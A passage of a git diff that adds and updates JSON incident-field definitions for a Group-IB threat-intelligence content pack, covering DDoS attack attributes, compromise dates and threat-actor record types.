@@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosduration", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosduration", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Duration", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json new file mode 100644 index 000000000000..b672f360259c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Protocol.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosprotocol", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosprotocol", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Protocol", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json new file mode 100644 index 000000000000..93b88d4d17fb --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosrequestbody", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosrequestbody", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Request Body", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json new file mode 100644 index 000000000000..37f797a8a557 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Body_Hash.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosrequestbodyhash", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosrequestbodyhash", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Request Body Hash", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json new file mode 100644 index 000000000000..f77162606efa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Data_Link.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosrequestdatalink", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosrequestdatalink", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Request Data Link", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json new file mode 100644 index 000000000000..61785a86d07e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Body.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosrequestheadersbody", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosrequestheadersbody", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Request Headers Body", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json new file mode 100644 index 000000000000..f19756961d28 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Request_Headers_Hash.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosrequestheadershash", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosrequestheadershash", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Request Headers Hash", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json new file mode 100644 index 000000000000..09ffceb1f6c1 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Source.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddossource", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddossource", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Source", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json new file mode 100644 index 000000000000..779c0cbe4ad8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_ASN.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetasn", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetasn", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target ASN", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json new file mode 100644 index 000000000000..8a41358538ee --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Category.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcategory", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcategory", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Category", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json new file mode 100644 index 000000000000..3813d5b2818c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_City.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcity", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcity", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target City", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json new file mode 100644 index 000000000000..2cc59988338c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Code.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcountrycode", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcountrycode", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Country Code", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json new file mode 100644 index 000000000000..4255c5622e03 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Country_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetcountryname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetcountryname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Country Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json new file mode 100644 index 000000000000..e8e89e23154f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Domain.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetdomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetdomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json new file mode 100644 index 000000000000..bafa61baf278 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json new file mode 100644 index 000000000000..a9cb46c71a8d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Port.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetport", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetport", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Port", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json new file mode 100644 index 000000000000..a4379a4404bd --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Provider.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetprovider", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetprovider", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Provider", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json new file mode 100644 index 000000000000..8eb184825c08 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_Region.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargetregion", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargetregion", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target Region", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json new file mode 100644 index 000000000000..f4050737b89d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Target_URL.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostargeturl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostargeturl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Target URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json new file mode 100644 index 000000000000..80fea87d7ae1 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Type.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddostype", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddostype", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Type", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json index 9ab3f2d7af7c..b5e51e996346 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Data_Hash.json @@ -1,7 +1,10 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB OSI Public Leak" + "GIB OSI Public Leak", + "GIB Compromised Mule", + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group" ], "caseInsensitive": false, "cliName": "gibdatahash", @@ -25,5 +28,13 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak", + "GIB Compromised Mule", + "GIB Attacks Phishing Kit", + "GIB Attacks Phishing Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json new file mode 100644 index 000000000000..eae41256cd18 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Add.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "gibdateadd", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdateadd", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Add", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json index 9c378027748e..6f97afc2baed 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Compromised.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card", + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json index 91bbe35a5fff..940f6fe370be 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created.json @@ -3,7 +3,8 @@ "associatedTypes": [ "GIB OSI Public Leak", "GIB Brand Protection Phishing Kit", - "GIB Brand Protection Domain" + "GIB Brand Protection Domain", + "GIB OSI Git Leak" ], "caseInsensitive": true, "cliName": "gibdatecreated", @@ -27,5 +28,13 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB OSI Public Leak", + "GIB Brand Protection Phishing Kit", + "GIB Brand Protection Domain", + "GIB OSI Git Leak" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json new file mode 100644 index 000000000000..8b6a6b3be1fa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Created_At.json @@ -0,0 +1,40 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibdatecreatedat", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatecreatedat", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date Created At", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json index 025a848d242f..d84813dfeb9d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_Expired.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json new file mode 100644 index 000000000000..ecf675980cc7 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Compromised.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibdatefirstcompromised", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdatefirstcompromised", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Date First Compromised", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group", + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Date_First_Seen.json new file mode 100644 index 000000000000..adef461de8db --- /dev/null +++ 